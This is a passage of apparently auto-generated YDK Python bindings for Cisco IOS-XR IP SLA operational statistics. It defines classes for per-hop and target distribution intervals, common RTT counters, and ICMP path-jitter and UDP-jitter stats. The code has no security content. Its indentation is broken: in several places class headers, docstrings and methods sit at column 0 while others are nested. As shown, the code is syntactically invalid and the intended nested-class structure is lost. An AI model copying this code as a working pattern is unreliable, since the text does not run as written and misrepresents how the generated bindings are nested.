    self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats()
    self.specific_stats.parent = self
    self._children_name_map["specific_stats"] = "specific-stats"
    self._children_yang_names.add("specific-stats")
    # Path segment includes the list-key predicate built from distribution_index.
    self._segment_path = lambda: "distribution-interval" + "[distribution-index='" + str(self.distribution_index) + "']"
def __setattr__(self, name, value):
    """Route every attribute write through YDK leaf validation."""
    entry_class = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval
    leaf_names = ['distribution_index']
    self._perform_setattr(entry_class, leaf_names, name, value)
class CommonStats(Entity):
    """
    Common Stats.

    Round-trip-time (RTT) samples and per-return-code update counters
    common to all operation types.  Every attribute is a uint32 counter
    unless noted otherwise; all default to ``None`` until populated.

    .. attribute:: operation_time        Operation Time (uint64)
    .. attribute:: return_code           Return code (:py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`)
    .. attribute:: response_time_count   Number of RTT samples used for the statistics
    .. attribute:: response_time         RTT
    .. attribute:: min_response_time     Minimum RTT
    .. attribute:: max_response_time     Maximum RTT
    .. attribute:: sum_response_time     Sum of RTT
    .. attribute:: sum2_response_time    Sum of RTT^2 (uint64)
    .. attribute:: update_count          Number of updates processed
    .. attribute:: ok_count              Updates with Okay return code
    .. attribute:: disconnect_count      Updates with Disconnected return code
    .. attribute:: timeout_count         Updates with Timeout return code
    .. attribute:: busy_count            Updates with Busy return code
    .. attribute:: no_connection_count   Updates with NotConnected return code
    .. attribute:: dropped_count         Updates with Dropped return code
    .. attribute:: internal_error_count  Updates with InternalError return code
    .. attribute:: sequence_error_count  Updates with SeqError return code
    .. attribute:: verify_error_count    Updates with VerifyError return code
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats, self).__init__()

        self.yang_name = "common-stats"
        self.yang_parent_name = "distribution-interval"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf order mirrors the YANG model; keys are Python attribute
        # names, values carry the hyphenated YANG leaf names and types.
        self._leafs = OrderedDict([
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('update_count', YLeaf(YType.uint32, 'update-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('busy_count', YLeaf(YType.uint32, 'busy-count')),
            ('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
            ('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
            ('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
        ])
        self.operation_time = None
        self.return_code = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.update_count = None
        self.ok_count = None
        self.disconnect_count = None
        self.timeout_count = None
        self.busy_count = None
        self.no_connection_count = None
        self.dropped_count = None
        self.internal_error_count = None
        self.sequence_error_count = None
        self.verify_error_count = None
        # Plain container (no list key), so the segment path is constant.
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
    """
    Operation Specific Stats.

    Holds the statistics specific to the configured operation type.
    NOTE(review): ``op_type`` presumably indicates which of the two child
    containers carries meaningful data — confirm against the YANG model.

    .. attribute:: icmp_path_jitter_stats  icmp path jitter stats (``SpecificStats.IcmpPathJitterStats``)
    .. attribute:: udp_jitter_stats        udp jitter stats (``SpecificStats.UdpJitterStats``)
    .. attribute:: op_type                 op type (:py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`)
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats, self).__init__()

        self.yang_name = "specific-stats"
        self.yang_parent_name = "distribution-interval"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats))])
        self._child_list_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('op_type', YLeaf(YType.enumeration, 'op-type')),
        ])
        self.op_type = None

        # Both child containers exist regardless of op_type.
        self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats()
        self.icmp_path_jitter_stats.parent = self
        self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
        self._children_yang_names.add("icmp-path-jitter-stats")

        self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats()
        self.udp_jitter_stats.parent = self
        self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
        self._children_yang_names.add("udp-jitter-stats")

        self._segment_path = lambda: "specific-stats"

    def __setattr__(self, name, value):
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
    """
    icmp path jitter stats.

    Per-hop ICMP path-jitter statistics.  Addresses are dotted-quad IPv4
    strings (with optional zone suffix); every other attribute is a
    uint32 counter unless noted; all default to ``None``.

    .. attribute:: source_address          IP Address of the source (str)
    .. attribute:: dest_address            IP Address of the destination (str)
    .. attribute:: hop_address             IP address of the hop in the path (str)
    .. attribute:: packet_interval         Interval between echos in ms
    .. attribute:: response_time_count     Number of RTT samples used for the statistics
    .. attribute:: response_time           RTT
    .. attribute:: min_response_time       Minimum RTT
    .. attribute:: max_response_time       Maximum RTT
    .. attribute:: sum_response_time       Sum of RTT
    .. attribute:: sum2_response_time      Sum of RTT^2 (uint64)
    .. attribute:: packet_count            Number of Echo replies received
    .. attribute:: packet_loss_count       Number of packets lost
    .. attribute:: out_of_sequence_count   Number of out of sequence packets
    .. attribute:: discarded_sample_count  Number of discarded samples
    .. attribute:: verify_errors_count     Number of packets with data corruption
    .. attribute:: dropped_error_count     Number of packets dropped
    .. attribute:: jitter                  Jitter value for this node in the path
    .. attribute:: pos_jitter_sum          Sum of positive jitter values
    .. attribute:: pos_jitter_sum2         Sum of squares of positive jitter values (uint64)
    .. attribute:: pos_jitter_min          Minimum positive jitter value
    .. attribute:: pos_jitter_max          Maximum positive jitter value
    .. attribute:: pos_jitter_count        Number of positive jitter values
    .. attribute:: neg_jitter_sum          Sum of negative jitter values
    .. attribute:: neg_jitter_min          Minimum negative jitter value
    .. attribute:: neg_jitter_max          Maximum negative jitter value
    .. attribute:: neg_jitter_sum2         Sum of squares of negative jitter values (uint64)
    .. attribute:: neg_jitter_count        Number of negative jitter values
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, self).__init__()

        self.yang_name = "icmp-path-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf order mirrors the YANG model.
        self._leafs = OrderedDict([
            ('source_address', YLeaf(YType.str, 'source-address')),
            ('dest_address', YLeaf(YType.str, 'dest-address')),
            ('hop_address', YLeaf(YType.str, 'hop-address')),
            ('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('packet_count', YLeaf(YType.uint32, 'packet-count')),
            ('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
            ('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
            ('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
            ('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
            ('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
            ('jitter', YLeaf(YType.uint32, 'jitter')),
            ('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
            ('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
            ('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
            ('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
            ('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
            ('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
            ('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
            ('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
            ('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
            ('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
        ])
        self.source_address = None
        self.dest_address = None
        self.hop_address = None
        self.packet_interval = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.packet_count = None
        self.packet_loss_count = None
        self.out_of_sequence_count = None
        self.discarded_sample_count = None
        self.verify_errors_count = None
        self.dropped_error_count = None
        self.jitter = None
        self.pos_jitter_sum = None
        self.pos_jitter_sum2 = None
        self.pos_jitter_min = None
        self.pos_jitter_max = None
        self.pos_jitter_count = None
        self.neg_jitter_sum = None
        self.neg_jitter_min = None
        self.neg_jitter_max = None
        self.neg_jitter_sum2 = None
        self.neg_jitter_count = None
        self._segment_path = lambda: "icmp-path-jitter-stats"

    def __setattr__(self, name, value):
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
    """
    udp jitter stats.

    UDP jitter statistics split by direction: SD = source-to-destination,
    DS = destination-to-source.  ``jitter_in``/``jitter_out`` are moving
    averages computed as per RFC 1889.  The ``*_sum`` fields for
    positive/negative SD/DS jitter are in milliseconds.  Every attribute
    is a uint32 counter except the ``*_sum2`` (sum-of-squares) fields,
    which are uint64; all default to ``None``.

    Jitter-value groups (positive_sd_*, negative_sd_*, positive_ds_*,
    negative_ds_*) each carry: sum, sum2, min, max, count.  "Positive"
    means network latency increased between two consecutive packets,
    "negative" that it decreased.

    .. attribute:: jitter_in               Input Jitter moving average (RFC1889)
    .. attribute:: jitter_out              Output Jitter moving average (RFC1889)
    .. attribute:: packet_loss_sd          Packets lost in SD direction
    .. attribute:: packet_loss_ds          Packets lost in DS direction
    .. attribute:: packet_out_of_sequence  Packets out of sequence
    .. attribute:: packet_mia              Packets missing in action (direction of loss unknown)
    .. attribute:: packet_skipped          Packets which are skipped
    .. attribute:: packet_late_arrivals    Packets arriving late
    .. attribute:: packet_invalid_tstamp   Packets with bad timestamps
    .. attribute:: internal_errors_count   Number of internal errors
    .. attribute:: busies_count            Number of busies
    .. attribute:: one_way_count           Probe/probe-response pairs used for one-way stats
    .. attribute:: one_way_sd_min/max/sum  One-way jitter values in SD direction (msec)
    .. attribute:: one_way_sd_sum2         Sum of squares of one-way SD jitter values (msec, uint64)
    .. attribute:: one_way_ds_min/max/sum  One-way jitter values in DS direction (msec)
    .. attribute:: one_way_ds_sum2         Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec, uint64)
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, self).__init__()

        self.yang_name = "udp-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf order mirrors the YANG model.
        self._leafs = OrderedDict([
            ('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
            ('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
            ('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
            ('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
            ('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
            ('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
            ('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
            ('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
            ('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
            ('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
            ('busies_count', YLeaf(YType.uint32, 'busies-count')),
            ('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
            ('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
            ('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
            ('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
            ('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
            ('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
            ('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
            ('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
            ('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
            ('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
            ('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
            ('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
            ('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
            ('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
            ('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
            ('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
            ('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
            ('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
            ('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
            ('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
            ('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
            ('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
            ('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
            ('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
            ('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
            ('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
            ('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
            ('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
            ('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
        ])
        self.jitter_in = None
        self.jitter_out = None
        self.packet_loss_sd = None
        self.packet_loss_ds = None
        self.packet_out_of_sequence = None
        self.packet_mia = None
        self.packet_skipped = None
        self.packet_late_arrivals = None
        self.packet_invalid_tstamp = None
        self.internal_errors_count = None
        self.busies_count = None
        self.positive_sd_sum = None
        self.positive_sd_sum2 = None
        self.positive_sd_min = None
        self.positive_sd_max = None
        self.positive_sd_count = None
        self.negative_sd_sum = None
        self.negative_sd_sum2 = None
        self.negative_sd_min = None
        self.negative_sd_max = None
        self.negative_sd_count = None
        self.positive_ds_sum = None
        self.positive_ds_sum2 = None
        self.positive_ds_min = None
        self.positive_ds_max = None
        self.positive_ds_count = None
        self.negative_ds_sum = None
        self.negative_ds_sum2 = None
        self.negative_ds_min = None
        self.negative_ds_max = None
        self.negative_ds_count = None
        self.one_way_count = None
        self.one_way_sd_min = None
        self.one_way_sd_max = None
        self.one_way_sd_sum = None
        self.one_way_sd_sum2 = None
        self.one_way_ds_min = None
        self.one_way_ds_max = None
        self.one_way_ds_sum = None
        self.one_way_ds_sum2 = None
        self._segment_path = lambda: "udp-jitter-stats"

    def __setattr__(self, name, value):
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Paths.Path.Hops.Hop.DistributionIntervals.DistributionInterval.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Target(Entity):
"""
Distribution statistics for the target
node
.. attribute:: distribution_intervals
Table of distribution intervals for a particular hop
**type**\: :py:class:`DistributionIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build the 'target' container (distribution statistics for the
    target node) and attach its distribution-intervals table."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target, self).__init__()

    self.yang_name = "target"
    self.yang_parent_name = "distributed"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_container_classes = OrderedDict([("distribution-intervals", ("distribution_intervals", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals))])
    self._child_list_classes = OrderedDict([])
    # No leaves on this container.
    self._leafs = OrderedDict()

    self.distribution_intervals = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals()
    self.distribution_intervals.parent = self
    self._children_name_map["distribution_intervals"] = "distribution-intervals"
    self._children_yang_names.add("distribution-intervals")

    self._segment_path = lambda: "target"
class DistributionIntervals(Entity):
    """
    Table of distribution intervals for a particular hop.

    .. attribute:: distribution_interval

    	1-hour aggregated statistics for a hop in a path-enabled operation.
    	**type**\: list of :py:class:`DistributionInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval>`
    """
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals, self).__init__()

        self.yang_name = "distribution-intervals"
        self.yang_parent_name = "target"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([("distribution-interval", ("distribution_interval", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval))])
        self._leafs = OrderedDict()
        # YList of DistributionInterval entries keyed by distribution-index.
        self.distribution_interval = YList(self)
        self._segment_path = lambda: "distribution-intervals"

    def __setattr__(self, name, value):
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals, [], name, value)
class DistributionInterval(Entity):
"""
1\-hour aggregated statistics for a hop in a
path\-enabled operation
.. attribute:: distribution_index (key)
Distribution Interval
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    """Build one target-side 'distribution-interval' list entry (keyed by
    distribution_index) and eagerly attach its two child containers."""
    super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval, self).__init__()

    self.yang_name = "distribution-interval"
    self.yang_parent_name = "distribution-intervals"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # 'distribution_index' is the YANG list key; it also forms the XPath
    # predicate in _segment_path below.
    self.ylist_key_names = ['distribution_index']
    self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('distribution_index', YLeaf(YType.int32, 'distribution-index')),
    ])
    self.distribution_index = None

    self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats()
    self.common_stats.parent = self
    self._children_name_map["common_stats"] = "common-stats"
    self._children_yang_names.add("common-stats")

    self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.SpecificStats()
    self.specific_stats.parent = self
    self._children_name_map["specific_stats"] = "specific-stats"
    self._children_yang_names.add("specific-stats")

    # Deferred so the predicate always reflects the current key value.
    self._segment_path = lambda: "distribution-interval" + "[distribution-index='" + str(self.distribution_index) + "']"
def __setattr__(self, name, value):
    """Route every attribute write through YDK leaf validation."""
    entry_class = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval
    leaf_names = ['distribution_index']
    self._perform_setattr(entry_class, leaf_names, name, value)
class CommonStats(Entity):
    """
    Common Stats

    .. attribute:: operation_time
    	Operation Time
    	**type**\: int
    	**range:** 0..18446744073709551615
    .. attribute:: return_code
    	Return code
    	**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
    .. attribute:: response_time_count
    	Number of RTT samples used for the statistics
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: response_time
    	RTT
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: min_response_time
    	Minimum RTT
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: max_response_time
    	Maximum RTT
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: sum_response_time
    	Sum of RTT
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: sum2_response_time
    	Sum of RTT^2
    	**type**\: int
    	**range:** 0..18446744073709551615
    .. attribute:: update_count
    	Number of updates processed
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: ok_count
    	Number of updates with Okay return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: disconnect_count
    	Number of updates with Disconnected return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: timeout_count
    	Number of updates with Timeout return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: busy_count
    	Number of updates with Busy return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: no_connection_count
    	Number of updates with NotConnected return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: dropped_count
    	Number of updates with Dropped return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: internal_error_count
    	Number of updates with InternalError return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: sequence_error_count
    	Number of updates with SeqError return code
    	**type**\: int
    	**range:** 0..4294967295
    .. attribute:: verify_error_count
    	Number of updates with VerifyError return code
    	**type**\: int
    	**range:** 0..4294967295
    """

    # YANG module metadata for this generated binding.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        """Initialize the ``common-stats`` container: register its leaves
        with the Entity base and default every leaf value to None."""
        super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours.Hour.Distributed.Target.DistributionIntervals.DistributionInterval.CommonStats, self).__init__()
        self.yang_name = "common-stats"
        self.yang_parent_name = "distribution-interval"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf registry; the OrderedDict preserves the YANG model's leaf order.
        self._leafs = OrderedDict([
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('update_count', YLeaf(YType.uint32, 'update-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('busy_count', YLeaf(YType.uint32, 'busy-count')),
            ('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
            ('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
            ('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
        ])
        # Leaf values start unset; each assignment below is intercepted by
        # __setattr__ and recorded via Entity._perform_setattr.
        self.operation_time = None
        self.return_code = None
        self.response_time_count = None
